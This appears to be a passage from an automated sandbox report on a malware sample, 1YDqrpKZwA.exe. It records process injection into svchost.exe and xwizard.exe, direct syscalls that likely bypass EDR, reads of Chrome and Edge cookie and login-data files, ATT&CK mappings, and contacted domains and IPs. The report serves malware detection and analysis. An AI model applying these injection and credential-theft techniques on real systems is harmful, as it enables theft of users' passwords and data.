                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]2_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652835 mov ecx, dword ptr fs:[00000030h]2_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]2_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]2_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A830 mov eax, dword ptr fs:[00000030h]2_2_0366A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D483A mov eax, dword ptr fs:[00000030h]2_2_036D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D483A mov eax, dword ptr fs:[00000030h]2_2_036D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BC810 mov eax, dword ptr fs:[00000030h]2_2_036BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FA8E4 mov eax, dword ptr fs:[00000030h]2_2_036FA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C8F9 mov eax, dword ptr fs:[00000030h]2_2_0366C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C8F9 mov eax, dword ptr fs:[00000030h]2_2_0366C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E8C0 mov eax, dword ptr fs:[00000030h]2_2_0365E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037008C0 mov eax, dword ptr fs:[00000030h]2_2_037008C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630887 mov eax, dword ptr fs:[00000030h]2_2_03630887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BC89D mov eax, dword ptr fs:[00000030h]2_2_036BC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365AF69 mov eax, dword ptr fs:[00000030h]2_2_0365AF69
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365AF69 mov eax, dword ptr fs:[00000030h]2_2_0365AF69
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2F60 mov eax, dword ptr fs:[00000030h]2_2_036D2F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2F60 mov eax, dword ptr fs:[00000030h]2_2_036D2F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704F68 mov eax, dword ptr fs:[00000030h]2_2_03704F68
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_006881F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_006881F7
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_0065A364 SetUnhandledExceptionFilter,0_2_0065A364
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_0065A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0065A395

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeNtAllocateVirtualMemory: Direct from: 0x77172BFCJump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeNtDelayExecution: Direct from: 0x77172DDCJump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeNtQuerySystemInformation: Direct from: 0x77172DFCJump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeNtReadFile: Direct from: 0x77172ADCJump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeNtQueryInformationProcess: Direct from: 0x77172C26Jump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeNtResumeThread: Direct from: 0x77172FBCJump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeNtWriteVirtualMemory: Direct from: 0x7717490CJump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeNtCreateUserProcess: Direct from: 0x7717371CJump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeNtOpenKeyEx: Direct from: 0x77172B9CJump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeNtNotifyChangeKey: Direct from: 0x77173C2CJump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeNtSetInformationProcess: Direct from: 0x77172C5CJump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeNtProtectVirtualMemory: Direct from: 0x77172F9CJump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeNtResumeThread: Direct from: 0x771736ACJump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeNtMapViewOfSection: Direct from: 0x77172D1CJump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeNtWriteVirtualMemory: Direct from: 0x77172E3CJump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeNtCreateMutant: Direct from: 0x771735CCJump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeNtDeviceIoControlFile: Direct from: 0x77172AECJump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeNtAllocateVirtualMemory: Direct from: 0x77172BECJump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeNtTerminateThread: Direct from: 0x77172FCCJump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeNtQueryInformationToken: Direct from: 0x77172CACJump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeNtCreateFile: Direct from: 0x77172FECJump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeNtOpenFile: Direct from: 0x77172DCCJump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeNtClose: Direct from: 0x77172B6C
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeNtSetInformationThread: Direct from: 0x771663F9Jump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeNtAllocateVirtualMemory: Direct from: 0x77173C9CJump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeNtQueryAttributesFile: Direct from: 0x77172E6CJump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeNtSetInformationThread: Direct from: 0x77172B4CJump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeNtReadVirtualMemory: Direct from: 0x77172E8CJump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeNtCreateKey: Direct from: 0x77172C6CJump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeNtQueryVolumeInformationFile: Direct from: 0x77172F2CJump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeNtAllocateVirtualMemory: Direct from: 0x771748ECJump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeNtQuerySystemInformation: Direct from: 0x771748CCJump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeNtOpenSection: Direct from: 0x77172E0CJump to behavior
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\xwizard.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: NULL target: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: NULL target: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeThread register set: target process: 1948Jump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeThread APC queued: target process: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeJump to behavior
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 945008Jump to behavior
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_00688C93 LogonUserW,0_2_00688C93
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_00633B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00633B4C
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_00634A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00634A35
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_00694EF5 mouse_event,0_2_00694EF5
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\1YDqrpKZwA.exe"Jump to behavior
                Source: C:\Program Files (x86)\RqJFhFDRwvriJbXrhHNUufVkTorybIUAsxfMPZlcpxWHAqySKTxb\bIMhSmtZ.exeProcess created: C:\Windows\SysWOW64\xwizard.exe "C:\Windows\SysWOW64\xwizard.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_006881F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_006881F7
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_00694C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00694C03
                Source: 1YDqrpKZwA.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: 1YDqrpKZwA.exe, bIMhSmtZ.exe, 00000008.00000000.1386507021.0000000001061000.00000002.00000001.00040000.00000000.sdmp, bIMhSmtZ.exe, 00000008.00000002.3089952367.0000000001061000.00000002.00000001.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000000.1531372272.00000000014A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: bIMhSmtZ.exe, 00000008.00000000.1386507021.0000000001061000.00000002.00000001.00040000.00000000.sdmp, bIMhSmtZ.exe, 00000008.00000002.3089952367.0000000001061000.00000002.00000001.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000000.1531372272.00000000014A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: bIMhSmtZ.exe, 00000008.00000000.1386507021.0000000001061000.00000002.00000001.00040000.00000000.sdmp, bIMhSmtZ.exe, 00000008.00000002.3089952367.0000000001061000.00000002.00000001.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000000.1531372272.00000000014A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerW
                Source: bIMhSmtZ.exe, 00000008.00000000.1386507021.0000000001061000.00000002.00000001.00040000.00000000.sdmp, bIMhSmtZ.exe, 00000008.00000002.3089952367.0000000001061000.00000002.00000001.00040000.00000000.sdmp, bIMhSmtZ.exe, 0000000A.00000000.1531372272.00000000014A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_0065886B cpuid 0_2_0065886B
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_006650D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_006650D7
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_00672230 GetUserNameW,0_2_00672230
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_0066418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_0066418A
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_00634AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00634AFE

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3088675987.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3089017853.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3090221719.0000000003110000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3091843748.0000000005320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1464158922.0000000004350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3089095776.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1463500650.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1463772333.0000000003300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\xwizard.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: 1YDqrpKZwA.exeBinary or memory string: WIN_81
                Source: 1YDqrpKZwA.exeBinary or memory string: WIN_XP
                Source: 1YDqrpKZwA.exeBinary or memory string: WIN_XPe
                Source: 1YDqrpKZwA.exeBinary or memory string: WIN_VISTA
                Source: 1YDqrpKZwA.exeBinary or memory string: WIN_7
                Source: 1YDqrpKZwA.exeBinary or memory string: WIN_8
                Source: 1YDqrpKZwA.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 4USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3088675987.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3089017853.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3090221719.0000000003110000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3091843748.0000000005320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1464158922.0000000004350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3089095776.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1463500650.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1463772333.0000000003300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_006A6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_006A6596
                Source: C:\Users\user\Desktop\1YDqrpKZwA.exeCode function: 0_2_006A6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_006A6A5A
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                2
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts
                1
                Abuse Elevation Control Mechanism
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
                3
                Obfuscated Files or Information
                NTDS116
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation
                1
                DLL Side-Loading
                LSA Secrets151
                Security Software Discovery
                SSH3
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection
                2
                Valid Accounts
                Cached Domain Credentials2
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem1
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1632423 Sample: 1YDqrpKZwA.exe Startdate: 07/03/2025 Architecture: WINDOWS Score: 100 28 www.tabs123.xyz 2->28 30 www.bitcoinescort.xyz 2->30 32 13 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Antivirus detection for URL or domain 2->44 46 Antivirus / Scanner detection for submitted sample 2->46 50 5 other signatures 2->50 10 1YDqrpKZwA.exe 4 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 bIMhSmtZ.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 xwizard.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 bIMhSmtZ.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.choujiezhibo.net 192.186.58.31, 49702, 49703, 49704 PING-GLOBAL-ASPingGlobalAmsterdamPOPASNNL United States 22->34 36 www.zltbd.top 198.2.236.221, 49718, 49719, 49720 PEGTECHINCUS United States 22->36 38 6 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.